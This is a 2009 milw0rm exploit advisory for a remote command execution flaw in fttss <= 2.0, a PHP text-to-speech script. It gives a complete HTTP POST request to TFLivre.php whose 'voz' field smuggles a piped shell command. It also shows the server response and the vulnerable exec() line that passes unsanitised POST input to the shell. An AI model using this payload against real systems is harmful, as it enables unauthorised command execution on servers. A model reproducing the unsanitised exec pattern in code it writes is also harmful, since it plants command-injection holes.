:::::::-. ... ::::::. :::. ;;, `';, ;; ;;;`;;;;, `;;; `[[ [[[[' [[[ [[[[[. '[[ $$, $$$$ $$$ $$$ "Y$c$$ 888_,o8P'88 .d888 888 Y88 MMMMP"` "YmmMMMM"" MMM YM [ Discovered by dun \ dun[at]strcpy.pl ] ############################################################## # [ fttss <= 2.0 ] Remote Command Execution Vulnerability # ############################################################## # # Script: "A Free Text-To-Speech System" # # Script site: http://fttss.sourceforge.net/ # Download: http://sourceforge.net/projects/fttss/ # # [RCE] Vuln: http://site.com/fttss/TFLivre.php # # POST /fttss/TFLivre.php HTTP/1.1 # # Host: site.com # User-Agent: Mozilla/5.0 # Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 # Accept-Language: pl,en-us;q=0.7,en;q=0.3 # Accept-Encoding: gzip,deflate # Accept-Charset: ISO-8859-2,utf-8;q=0.7,*;q=0.7 # Keep-Alive: 300 # Connection: keep-alive # Content-Type: application/x-www-form-urlencoded # Content-Length: 41 # # texto_original=a&voz=|uname -a>/tmp/dupa; # # HTTP/1.x 200 OK # Date: Sun, 11 Jan 2009 16:24:57 GMT # Server: Apache # X-Powered-By: PHP/5.2.8-pl1-gentoo # Content-Length: 1731 # Keep-Alive: timeout=15, max=100 # Connection: Keep-Alive # Content-Type: text/html # # Bug: ./fttss_v2.0/TFLivre.php (line: 110) # # ... # exec("./mbrola-linux-i386 -e ".$_POST[voz]." $dirsaida/saida.txt ".$nome_som.".wav"); //$dirsaida/saida".$npid.".wav"); # ... # # ############################################### # Greetz: D3m0n_DE * str0ke * and otherz.. ############################################### [ dun / 2009 ] ******************************************************************************************* # milw0rm.com [2009-01-11]